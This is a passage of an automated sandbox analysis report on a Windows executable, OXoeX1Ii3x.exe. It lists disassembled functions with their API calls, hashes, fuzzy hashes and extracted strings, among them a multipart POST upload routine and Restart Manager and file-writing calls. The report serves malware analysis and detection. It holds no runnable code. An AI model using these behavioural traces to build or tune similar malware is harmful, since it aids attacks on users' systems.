                                                                                                                                                                                                • Opcode ID: f912e89699a35664a3399c348dc54388ad4ed693fad0d19689a5e5786d55f91d
                                                                                                                                                                                                • Instruction ID: 8757e808f020e632445316af4ac4e26735b347229bc9c9970b2b72760d20f640
                                                                                                                                                                                                • Opcode Fuzzy Hash: f912e89699a35664a3399c348dc54388ad4ed693fad0d19689a5e5786d55f91d
                                                                                                                                                                                                • Instruction Fuzzy Hash: AB518C7250021AEBEF209F64CC45FAB7BAAEB44752F254039FD25EB190D7708D5ACB50
                                                                                                                                                                                                Function 0017451B Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _strrchr
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3213747228-0
                                                                                                                                                                                                • Opcode ID: 12cbd57efc24f00b10807126745757f58c8e6f66b67890c3a73c114f1d70c3a1
                                                                                                                                                                                                • Instruction ID: 18e6f25e50fcb9c91c6abb0e5da2b30af5c5140b42c8374bc5b02ce25fc30df6
                                                                                                                                                                                                • Opcode Fuzzy Hash: 12cbd57efc24f00b10807126745757f58c8e6f66b67890c3a73c114f1d70c3a1
                                                                                                                                                                                                • Instruction Fuzzy Hash: B0B16932A042959FDB25CF68CC81BBE7BB5EF2A350F15C155F908AB282D374D901C7A0
                                                                                                                                                                                                Function 00146671 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 199COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 0014667B
                                                                                                                                                                                                  • Part of subcall function 00146543: __EH_prolog3_GS.LIBCMT ref: 0014654D
                                                                                                                                                                                                • OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00146893
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3_$DebugOutputString
                                                                                                                                                                                                • String ID: --------$($Content-Type: application/octet-stream; boundary=----$POST
                                                                                                                                                                                                • API String ID: 345087456-2938435220
                                                                                                                                                                                                • Opcode ID: fedf2cf3357ed143455d911818b3163cfd045cdb26ff17c04965ecbac2fa4d25
                                                                                                                                                                                                • Instruction ID: 6df82dbaa2dbe38eb9e15554619f93e5980460bab9062fa52b3e837d48d4ae9e
                                                                                                                                                                                                • Opcode Fuzzy Hash: fedf2cf3357ed143455d911818b3163cfd045cdb26ff17c04965ecbac2fa4d25
                                                                                                                                                                                                • Instruction Fuzzy Hash: D07186B0A002199FDF209F10CD85BBE77B8EF85715F004199FA09A7192DB709E85CFA5
                                                                                                                                                                                                Function 0015B335 Relevance: 10.7, APIs: 7, Instructions: 159synchronizationCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0015C2B7: __EH_prolog3_GS.LIBCMT ref: 0015C2C1
                                                                                                                                                                                                  • Part of subcall function 0015C0F0: __EH_prolog3_catch_GS.LIBCMT ref: 0015C0F7
                                                                                                                                                                                                • RmStartSession.RSTRTMGR(?,00000000,?,?,?,00000000), ref: 0015B3F0
                                                                                                                                                                                                  • Part of subcall function 0015ABF2: __EH_prolog3_GS.LIBCMT ref: 0015ABF9
                                                                                                                                                                                                  • Part of subcall function 0015ABF2: ctype.LIBCPMT ref: 0015ACB5
                                                                                                                                                                                                • RmRegisterResources.RSTRTMGR(?,00000001,?,00000000,00000000,00000000,00000000), ref: 0015B43F
                                                                                                                                                                                                • RmGetList.RSTRTMGR(?,?,0000000A,?,?), ref: 0015B479
                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 0015B493
                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0015B4CF
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0015B4D6
                                                                                                                                                                                                • RmEndSession.RSTRTMGR(?), ref: 0015B4F9
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3_Session$CloseCurrentH_prolog3_catch_HandleListObjectProcessRegisterResourcesSingleStartWaitctype
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4225474974-0
                                                                                                                                                                                                • Opcode ID: 3016b83f0b0e9ec741b27bd7da5622cfa8b13d1eb0dcfa1d3275a0e36f115582
                                                                                                                                                                                                • Instruction ID: cbe6d63a732b9a4b4de6ee70d99bce54b463cbc0e9b53e546ea0bb86978a8231
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3016b83f0b0e9ec741b27bd7da5622cfa8b13d1eb0dcfa1d3275a0e36f115582
                                                                                                                                                                                                • Instruction Fuzzy Hash: E2519D71A05218EFDB21DB64CD89ADE7BB8EF16340F4001A5F80AA7591D7345F88CB52
                                                                                                                                                                                                Function 001601A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 001601D7
                                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 001601DF
                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00160268
                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00160293
                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 001602E8
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                                                                                • Opcode ID: 72975694abdcd64db6527be9c0f4c5f02fa20c53c93684fa6105b7f1aa542aba
                                                                                                                                                                                                • Instruction ID: 48bb002ebb036b8637cbd7d757864000128f94a9a9ba3b0769fa40be42637ee2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 72975694abdcd64db6527be9c0f4c5f02fa20c53c93684fa6105b7f1aa542aba
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A419534A00218DBCF16DF68CC95AAFBBB5EF49314F148159E8146B392D731DA65CB90
                                                                                                                                                                                                Function 0015A393 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 115COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 0015A39A
                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0015A3A7
                                                                                                                                                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0015A3F8
                                                                                                                                                                                                  • Part of subcall function 0015DF22: _Yarn.LIBCPMT ref: 0015DF41
                                                                                                                                                                                                  • Part of subcall function 0015DF22: _Yarn.LIBCPMT ref: 0015DF65
                                                                                                                                                                                                • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0015A44A
                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0015A4D6
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: std::_$Locinfo::_LockitYarn$H_prolog3Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                                                                                                                • String ID: bad locale name
                                                                                                                                                                                                • API String ID: 2469272659-1405518554
                                                                                                                                                                                                • Opcode ID: 5e7fbf2ba5997aeb8a6c089c6f508245f6bcf3c239edf5e7d6abe14f72b8eecb
                                                                                                                                                                                                • Instruction ID: 71edc2b827f50ba0034f4711b78f07be517b50b5cd7bb67cab8a26934802b4db
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e7fbf2ba5997aeb8a6c089c6f508245f6bcf3c239edf5e7d6abe14f72b8eecb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9941BF31809B84DFCB31DFA9D94174AFBF0AF14311F24C6AEE09A97681C7749A08CB55
                                                                                                                                                                                                Function 00171D4A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,4B460E4E,?,00171E59,?,?,00000000,?), ref: 00171E0B
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                • API String ID: 3664257935-537541572
                                                                                                                                                                                                • Opcode ID: 0b992f1f5bad3a7a6b9f925e796dffb6de5d943991d68170f824d2d3973c73ef
                                                                                                                                                                                                • Instruction ID: f56303ac8f4b0c5d9ef85a59ec7d6cbd942b8d19b429e65f7234ae3cb73eaba0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b992f1f5bad3a7a6b9f925e796dffb6de5d943991d68170f824d2d3973c73ef
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1121EB72A00610B7D7319BA9DC49A5E3779AF427A0F254165F819A72D1DB30EE40CBE1
                                                                                                                                                                                                Function 00163D92 Relevance: 9.3, APIs: 6, Instructions: 265COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __allrem.LIBCMT ref: 00163F1A
                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00163F36
                                                                                                                                                                                                • __allrem.LIBCMT ref: 00163F4D
                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00163F6B
                                                                                                                                                                                                • __allrem.LIBCMT ref: 00163F82
                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00163FA0
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1992179935-0
                                                                                                                                                                                                • Opcode ID: c2c21de6e89a5a046325f8e7b47af35d8f050f99e2fc3b5b3c456845d04feeb3
                                                                                                                                                                                                • Instruction ID: c596a47d3b08497522cef2cb4bb765e918b0311d93761d0c8df1228793acb312
                                                                                                                                                                                                • Opcode Fuzzy Hash: c2c21de6e89a5a046325f8e7b47af35d8f050f99e2fc3b5b3c456845d04feeb3
                                                                                                                                                                                                • Instruction Fuzzy Hash: D7811772A007129BD724AF78CC81BABB7F9AF54320F24812EF525D7681E770DB548B90
                                                                                                                                                                                                Function 0015760F Relevance: 9.1, APIs: 6, Instructions: 78fileCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00157644
                                                                                                                                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000080,00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00157679
                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,?,00000000,00000000,?,40000000,00000000,00000000,00000003,00000080,00000000,?,?,40000000,00000000,00000000), ref: 0015768C
                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000001,?,00000000,?,40000000,00000000,00000000,00000003,00000080,00000000,?,?,40000000,00000000), ref: 001576A3
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,40000000,00000000,00000000,00000003,00000080,00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 001576AA
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 001576B9
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: File$CloseCreateHandle$PointerWrite
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2606874340-0
                                                                                                                                                                                                • Opcode ID: 9f0b711c66d8cf4e0e55b7602b36a43e3ddf20981ddd45db5ac80c7bc9e51eaa
                                                                                                                                                                                                • Instruction ID: 3794021a179466e6d24e3703a7f73d1236afabcc36d945f0b7c37b3855b6fd43
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f0b711c66d8cf4e0e55b7602b36a43e3ddf20981ddd45db5ac80c7bc9e51eaa
                                                                                                                                                                                                • Instruction Fuzzy Hash: B8214C71A00204EFE7249B6CED4AF6B77BCEB48711F100659F526DB2D1D6B0A9488B64
                                                                                                                                                                                                Function 0015E3C2 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 0015E3C9
                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0015E3D3
                                                                                                                                                                                                  • Part of subcall function 0015A4EA: __EH_prolog3_GS.LIBCMT ref: 0015A4F1
                                                                                                                                                                                                  • Part of subcall function 0015A4EA: std::_Lockit::_Lockit.LIBCPMT ref: 0015A502
                                                                                                                                                                                                  • Part of subcall function 0015A4EA: std::_Lockit::~_Lockit.LIBCPMT ref: 0015A524
                                                                                                                                                                                                • codecvt.LIBCPMT ref: 0015E40D
                                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 0015E424
                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0015E444
                                                                                                                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 0015E451
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Registercodecvt
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 878568432-0
                                                                                                                                                                                                • Opcode ID: 01332a55ca82bba43db3718eb2c8b5cc6bfeb3d78df53c388210544608fd4812
                                                                                                                                                                                                • Instruction ID: c393733ac607e995163ec22a266c0c0e16b4936773ddc631c1f04f0097c818ef
                                                                                                                                                                                                • Opcode Fuzzy Hash: 01332a55ca82bba43db3718eb2c8b5cc6bfeb3d78df53c388210544608fd4812
                                                                                                                                                                                                • Instruction Fuzzy Hash: B511E471900225DFCB19EBA4D9426AE7BF5EF50312F54441DED26EB381EB709B09CB82
                                                                                                                                                                                                Function 001623CA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,001623C1,0016051C,0015D594), ref: 001623D8
                                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001623E6
                                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001623FF
                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,001623C1,0016051C,0015D594), ref: 00162451
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                                                • Opcode ID: 2e8815d7a6bedc7f397a209a7343cc6598465bacd9e5e93cf7cb9a8ba18a1661
                                                                                                                                                                                                • Instruction ID: 029acd94e6fafdcd8e1c1547e91c920535505704af228ff67075939d15faa3b6
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e8815d7a6bedc7f397a209a7343cc6598465bacd9e5e93cf7cb9a8ba18a1661
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A01203210AB116EE7142778BC896272768EB22374734033EF534555F1EF664D71D2C8
                                                                                                                                                                                                Function 0014CBA6 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 0014CBAD
                                                                                                                                                                                                  • Part of subcall function 0014DF81: __EH_prolog3.LIBCMT ref: 0014DF88
                                                                                                                                                                                                  • Part of subcall function 0014FC37: __EH_prolog3.LIBCMT ref: 0014FC3E
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3
                                                                                                                                                                                                • String ID: '$; expected $syntax error $unexpected
                                                                                                                                                                                                • API String ID: 431132790-3930586041
                                                                                                                                                                                                • Opcode ID: 44bd6c1a05e0506db95bc0abf7163e053ffd043f37c938bc6efa70bdffb40746
                                                                                                                                                                                                • Instruction ID: a7f90b8e7abedea9fc1b4894bf25732dcbd93f1121c06c121049588d3f1551a8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 44bd6c1a05e0506db95bc0abf7163e053ffd043f37c938bc6efa70bdffb40746
                                                                                                                                                                                                • Instruction Fuzzy Hash: 19319DB0D45209EBDF08EFA4C596AEEBF74AF24300F51406DE009AB292DB705B46CB91
                                                                                                                                                                                                Function 0016FDF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • C:\Users\user\Desktop\OXoeX1Ii3x.exe, xrefs: 0016FE14
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: C:\Users\user\Desktop\OXoeX1Ii3x.exe
                                                                                                                                                                                                • API String ID: 0-110836289
                                                                                                                                                                                                • Opcode ID: 98e5b0b8345338e911255b0c555e3a756e6c39ff4bca9548dda5685324bea8da
                                                                                                                                                                                                • Instruction ID: adcc23ac9bf55288b6a360d5599514d10cdf5479e60494d84c0eff46ea91e202
                                                                                                                                                                                                • Opcode Fuzzy Hash: 98e5b0b8345338e911255b0c555e3a756e6c39ff4bca9548dda5685324bea8da
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D21C672A0020AAFCB10AF65ED4196B7BA9FF11364712453CF81597662E732EC7287A0
                                                                                                                                                                                                Function 0016C180 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,4B460E4E,00000000,?,00000000,00185794,000000FF,?,0016C15C,?,?,0016C130,00000000), ref: 0016C1B5
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0016C1C7
                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,00185794,000000FF,?,0016C15C,?,?,0016C130,00000000), ref: 0016C1E9
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
